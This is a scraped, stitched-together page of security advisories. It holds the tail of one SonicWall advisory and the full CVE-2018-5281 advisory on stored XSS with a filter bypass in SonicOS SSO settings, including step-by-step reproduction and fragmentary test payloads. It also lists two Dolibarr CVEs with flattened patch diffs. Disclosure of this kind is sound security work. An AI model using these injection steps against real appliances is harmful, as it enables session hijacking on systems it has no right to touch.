1007=applFolder; 1022=true; SessId=null; PageSeed=null; tabbedWinAlert=done; 777=0; 7433=divHAInterfaces; 7513=0; 2039=local; 2040=%7B%22refreshTime%22%3A3%2C%22 showTimeRange%22%3A10%2C%22refreshEnable%22%3Atrue%2C %22viewApplications%22%3A1%2C%22viewBandwidth%22%3A1%2C%22viewPktRate%22%3A1%2C%22viewPktSize%22%3A1%2C%22 viewConnRate%22%3A1%2C%22viewConnCount%22%3A1%2C%22viewCoreMonitor%22%3A1%2C%22displayBandwidth%22%3A%22bwSelRate%22%2C %22displayPktRate%22%3A%22pktRateSelRate%22%2C%22displayPktSize%22%3A%22pktSizeSelRate%22%2C%22displayConnRate%22%3A%22 connRateSelRate%22%2C%22displayConnCount%22%3A%22connCountSelCount%22%2C%22ipVerBandwidth%22%3A%222%22%2C %22ipVerApps%22%3A%222%22%2C%22showMostFrequentApps%22%3Afalse%2C%22inChartAppLegends%22%3Afalse%2C%22hideAppLegends%22%3Atrue%2C%22inChartBwLegends %22%3Afalse%2C%22hideBwLegends%22%3Atrue%2C%22hidePktRateLegends%22%3Atrue%2C %22hidePktSizeLegends%22%3Atrue%2C%22hideConnRateLegends%22%3Atrue%2C%22hideConnCountLegends%22%3Atrue%2C%22hideAppChart%22%3Afalse%2C%22hideBwChart %22%3Afalse%2C%22hidePktRateChart%22%3Afalse%2C%22hidePktSizeChart%22%3Afalse%2C %22hideConnRateChart%22%3Afalse%2C%22hideConnCountChart%22%3Afalse%2C%22hideCoreMonChart%22%3Afalse%2C%22hideMemoryMonChart%22%3Afalse%2C%22rtAppColors %22%3A%5B%22%23081D58%22%2C%22%23253494%22%2C%22%23225EA8%22%2C%22%231D91C0%22%2C %22%2341B6C4%22%2C%22%237FCDBB%22%2C%22%23C7E9B4%22%2C%22%23EDF8B1%22%2C%22%23FFFFD9%22%5D%2C%22rtDataColors %22%3A%5B%22%23E41A1C%22%2C%22%23377EB8%22%2C%22%234DAF4A%22%2C%22%23984EA3%22%2C%22%23FF7F00%22%2C%22%23FFFF33%22%2C %22%23A65628%22%2C%22%23F781BF%22%2C%22%23999999%22%2C%22%235A6B34%22%2C%22%23F0D64E%22%2C%22%23D7B740%22%2C%22%23AB80 24%22%2C%22%23925818%22%2C%22%23DB5A6E%22%2C%22%23071D69%22%2C%22%230A1650%22%2C%22%234571DA%22%2C%22%23E18B5C%22%2C %22%23028482%22%2C%22%237ABA7A%22%2C%22%23B76EB8%22%5D%2C%22useGradient%22%3Atrue%7D\] POST-Daten: csrfToken\[???\] inputbox\[123123123+%22%3E%3CMALIICOUS INJECTED PAYLOAD!+src%3Da%3E\] list\[123123123+%22%3E%3CMALIICOUS INJECTED PAYLOAD!+src%3Da%3E\] gav\_cloud\_exclude\_list\[123123123+%22%3E%3CMALIICOUS INJECTED PAYLOAD!+src%3Da%3E\] gav\_cloud\_refresh\_exclusions\[\] refresh\_page\[gav\_cloud.html\] isobject\[1\] cgiaction\[%5Bobject+Window%5D\] Reference(s): https://utm\_waf.sonicwall.localhost:8351/main.cgi https://utm\_waf.sonicwall.localhost:8351/gavCloudExclusions.html https://utm\_waf.sonicwall.localhost:8351/addTrustedDomainDlg.html Solution - Fix & Patch: ======================= The vulnerability can be patched by setting up a secure validation for the update inputbox save procedure. Use the same as on the add procedure. Encode the context and disallow usage of special chars in the item list when processing to add. Parse the context and filter the input next to the permanent save that finally displays the context in the main item list to prevent an application-side script code execution. Note: The vulnerabilities has been reported to the dell security team. The issue has been resolved to 2016Q4 - 2017Q4 by the sonicwall developers. Security Risk: ============== The security risk of the application-side input validation web vulnerability and the filter bypass issue are estimated as medium (CVSS 4.5). Credits & Authors: ================== Benjamin K.M. \[bkm@vulnerability-lab.com\] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss\_upcoming.php - vulnerability-lab.com/rss/rss\_news.php Social: twitter.com/vuln\_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission. Copyright © 2018 | Vulnerability Laboratory - \[Evolution Security GmbH\]™

CVE-2018-5281

SonicWall SonicOS on Network Security Appliance (NSA) 2016 Q4 devices has XSS via the Configure SSO screens.

Document Title: =============== SonicWall SonicOS NSA - Multiple Web Vulnerabilities References (Source): ==================== http://www.vulnerability-lab.com/get\_content.php?id=1725 Release Date: ============= 2018-01-06 Vulnerability Laboratory ID (VL-ID): ==================================== 1725 Common Vulnerability Scoring System: ==================================== 4.5 Vulnerability Class: ==================== Multiple Current Estimated Price: ======================== 1.000€ - 2.000€ Product & Service Introduction: =============================== Achieve a deeper level of security with the SonicWALL Network Security Appliance (NSA) Series of next-generation firewalls. NSA Series appliances integrate automated and dynamic security capabilities into a single platform, combining the patented1, SonicWALL Reassembly Free Deep Packet Inspection (RFDPI) firewall engine with a powerful, massively scalable, multi-core architecture. Now you can block even the most sophisticated threats with an intrusion prevention system (IPS) featuring advanced anti-evasion capabilities, SSL decryption and inspection, and network-based malware protection that leverages the power of the cloud. (Copy of the Homepage: http://www.sonicwall.com/products/sonicwall-nsa/ ) The proven SonicOS architecture is at the core of every Dell SonicWALL firewall from the SuperMassive™ E10800 to the TZ 100. SonicOS uses deep packet inspection technology in combination with multi-core specialized security microprocessors to deliver application intelligence, control, and real-time visualization, intrusion prevention, high-speed virtual private networking (VPN) technology and other robust security features. (Copy of the Homepage: http://www.sonicwall.com/network-security-os-platform/ ) Abstract Advisory Information: ============================== The vulnerability laboratory core research Team discovered multiple persistent validation vulnerabilities and a filter bypass issue in the official DELL SonicWall SonicOS NSA Series web-application firewall (utm) appliances. Vulnerability Disclosure Timeline: ================================== 2018-01-06: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== DELL Product: SonicWall UTM Firewall (NSA;MX,CLI;TZ) Series 2016 Q4 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ Multiple persistent input validation web vulnerabilities and a filter bypass issue has been discovered in the official SonicWall SoniOS NSA UTM Web-Firewall Series. The issue allows remote attackers and privileged user accounts to inject own malicious script codes with persistent attack vector to the affected modules to compromise the web-application or user session data. The peristent exploitable validation vulnerabilities are located in the \`Host Name / IP Address\`, \`Client Name/IP Address\` and \`Proxy Forward To\` input fields of the \`Users - Settings - Configure SSO\` web appliance module. Remote attackers and low privileged application user accounts are able to inject own malicious script codes to the vulnerable input fields to compromise the \`Users - Settings - Configure SSO\` settings module item listing. At the end an attacker is able to save the information as executable content within the backend. After that the malicious context is saved to the SSO configuration module which executes the context. The input fields are not parsed, the context does not encode the input with a secure mechanism. The injection points are the marked input fields with the request method of the vulnerable modules. The execution points are located in the item listing of the separate sections. A filter restriction is implemented and is trying to secure the validation. The filter mechanism parses iframes with src source and other script code tags. In case of a mouseover onload link to a source or an img src onload with cookie alert the tags can bypass the filter validation procedure somehow and an execution of the context occurs. The security risk of the peristent web vulnerabilities and filter bypass issue are estimated as medium with a cvss (common vulnerability scoring system) count of 4.5. Exploitation of the persistent web vulnerabilities and filter bypass issue requires a low privileged web application user account and low or medium user interaction. Successful exploitation of the vulnerability results in session hijacking, persistent phishing, persistent external redirects, persistent load of malicious script codes or persistent web module context manipulation. Affected Request Method(s): \[+\] POST Vulnerable Module(s): \[+\] Users - Settings - Configure SSO - SSO Agents \[+\] Users - Settings - Configure SSO - Terminal Services Agent Settings \[+\] Users - Settings - Configure SSO - RADIUS Accounting Single-Sign-On Vulnerable Input(s): \[+\] Host Name / IP Address \[+\] Client Name/IP Address \[+\] Proxy Forward To Vulnerable Parameter(s): \[+\] ldapServerBindName \[+\] usrTreesSel \[+\] ldapUsrsTree\_1 \[+\] svcObjId Affected Serie(s): \[+\] SonicWALL NSA 6600 \[+\] SonicWALL NSA 5600 \[+\] SonicWALL NSA 4600 \[+\] SonicWALL NSA 3600 \[+\] SonicWALL NSA 2600 \[+\] SonicWALL NSA 250M Affected System(s): \[+\] SonicOS (Standard or Enhanced) Proof of Concept (PoC): ======================= The web vulnerabilities can be exploited by remote attackers with low privileged or restricted appliance application user account with low or medium user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Open the appliance web-application firewall of sonicwall and login as restricted user or lower privileged user account 2. Surf to the Users module 3. Click to Settings and open the "SSO Configure" button 4. Open one of the vulnerable modules Note: Users > Settings > Configure SSO > SSO Agents; > Terminal Services Agent Settings or > RADIUS Accounting Single-Sign-On 5. Inject a script code payload to the Host Name/IP Address(es), Client Name/IP Address & Proxy Forward To input fields Note: Regular frames are filtered but img or iframes with alert onload or onmouseover tag do bypass the filter validation 6. Save the entry and the payload directly executes in the utm firewall web user interface 7. Successful reproduce of the application-side input validation vulnerability and filter bypass issue! PoC Payload(s): ">XSS ONMOUSEOVER TEST "> "><"%20%20>"

CVE-2018-5280

SQL injection vulnerability in comm/multiprix.php in Dolibarr ERP/CRM version 6.0.4 allows remote attackers to execute arbitrary SQL commands via the id parameter.

@@ -33,7 +33,7 @@ $langs\->load("companies");  
// Security check $socid = isset($\_GET\["socid"\])?$\_GET\["socid"\]:''; $socid = GETPOST("socid", 'int'); if ($user\->societe\_id) $socid\=$user\->societe\_id; $result = restrictedArea($user, 'societe',$socid,'');  
@@ -81,7 +81,7 @@ while ($i < $num) { $row = $db\->fetch\_row($resql);  
  
print '<tr class="oddeven">'; print '<td>'.$langs\->trans($commande\->statuts\[$row\[1\]\]).'</td>'; @@ -132,7 +132,7 @@ $var = true; while ($i < $num) {  
$obj = $db\->fetch\_object($resql); print '<tr class="oddeven"><td class="nowrap">'; $commandestatic\->id\=$obj\->rowid; @@ -151,7 +151,7 @@ } if ($total\>0) {  
print '<tr class="liste\_total"><td>'.$langs\->trans("Total").'</td><td colspan="2" align="right">'.price($total)."</td></tr>"; } print "</table>"; @@ -190,7 +190,7 @@ while ($i < $num && $i < 20) { $obj = $db\->fetch\_object($resql);  
print '<tr class="oddeven"><td class="nowrap">'; $facturestatic\->ref\=$obj\->ref; $facturestatic\->id\=$obj\->rowid; @@ -263,7 +263,7 @@  
while ($obj = $db\->fetch\_object($resql) ) {  
  
print '<tr class="oddeven">'; print '<td><a href="card.php?socid='.$obj\->socid.'">'.img\_object($langs\->trans("ShowSupplier"),"company").'</a>'; @@ -300,7 +300,7 @@  
foreach ($companystatic\->SupplierCategories as $rowid => $label) {  
print "<tr ".$bc\[$var\]."\>\\n"; print '<td>'; $categstatic\->id\=$rowid;

CVE-2017-17897: FIX security vulnerability reported by ADLab of Venustech · Dolibarr/dolibarr@4a5988a

Dolibarr ERP/CRM version 6.0.4 does not block direct requests to *.tpl.php files, which allows remote attackers to obtain sensitive information.

@@ -26,6 +26,13 @@ \* $elementtype \*/  
// Protection to avoid direct call of template if (empty($conf) || ! is\_object($conf)) { print "Error, template page can't be called as URL"; exit; }  
?>  
 @@ -56,11 +63,11 @@ function init\_typeoffields(type)  
// Case of computed field console.log(type); if (type \== '' || type \== 'varchar' || type \== 'int' || type \== 'double' || type \== 'price') { jQuery("tr.extra\_computed\_value").show(); if (type \== '' || type \== 'varchar' || type \== 'int' || type \== 'double' || type \== 'price') { jQuery("tr.extra\_computed\_value").show(); } else { computed\_value.val(''); jQuery("tr.extra\_computed\_value").hide(); } } if (computed\_value.val()) { console.log("We enter a computed formula"); @@ -75,7 +82,7 @@ function init\_typeoffields(type) jQuery("#default\_value, #unique, #required, #alwayseditable, #ishidden, #list").attr('disabled', false); jQuery("tr.extra\_default\_value, tr.extra\_unique, tr.extra\_required, tr.extra\_alwayseditable, tr.extra\_ishidden, tr.extra\_list").show(); }  
if (type \== 'date') { size.val('').prop('disabled', true); unique.removeAttr('disabled'); jQuery("#value\_choice").hide();jQuery("#helpchkbxlst").hide(); } else if (type \== 'datetime') { size.val('').prop('disabled', true); unique.removeAttr('disabled'); jQuery("#value\_choice").hide(); jQuery("#helpchkbxlst").hide();} else if (type \== 'double') { size.val('24,8').removeAttr('disabled'); unique.removeAttr('disabled'); jQuery("#value\_choice").hide(); jQuery("#helpchkbxlst").hide();} @@ -90,8 +97,8 @@ function init\_typeoffields(type) else if (type \== 'checkbox') { size.val('').prop('disabled', true); unique.removeAttr('checked').prop('disabled', true); jQuery("#value\_choice").show();jQuery("#helpselect").show();jQuery("#helpsellist").hide();jQuery("#helpchkbxlst").hide();jQuery("#helplink").hide();} else if (type \== 'chkbxlst') { size.val('').prop('disabled', true); unique.removeAttr('checked').prop('disabled', true); jQuery("#value\_choice").show();jQuery("#helpselect").hide();jQuery("#helpsellist").hide();jQuery("#helpchkbxlst").show();jQuery("#helplink").hide();} else if (type \== 'link') { size.val('').prop('disabled', true); unique.removeAttr('disabled'); jQuery("#value\_choice").show();jQuery("#helpselect").hide();jQuery("#helpsellist").hide();jQuery("#helpchkbxlst").hide();jQuery("#helplink").show();} else if (type \== 'separate') { size.val('').prop('disabled', true); unique.removeAttr('checked').prop('disabled', true); required.val('').prop('disabled', true); else if (type \== 'separate') { size.val('').prop('disabled', true); unique.removeAttr('checked').prop('disabled', true); required.val('').prop('disabled', true); jQuery("#value\_choice").hide();jQuery("#helpselect").hide();jQuery("#helpsellist").hide();jQuery("#helpchkbxlst").hide();jQuery("#helplink").hide(); } else { // type = string @@ -102,12 +109,12 @@ function init\_typeoffields(type) if (type \== 'separate') { required.removeAttr('checked').prop('disabled', true); alwayseditable.removeAttr('checked').prop('disabled', true); list.val('').prop('disabled', true); jQuery('#size, #default\_value').val('').prop('disabled', true); jQuery('#size, #default\_value').val('').prop('disabled', true); } else { default\_value.removeAttr('disabled'); required.removeAttr('disabled'); alwayseditable.removeAttr('disabled'); list.val('').removeAttr('disabled'); required.removeAttr('disabled'); alwayseditable.removeAttr('disabled'); list.val('').removeAttr('disabled'); } } init\_typeoffields('<?php echo GETPOST('type'); ?>');

Tag

#php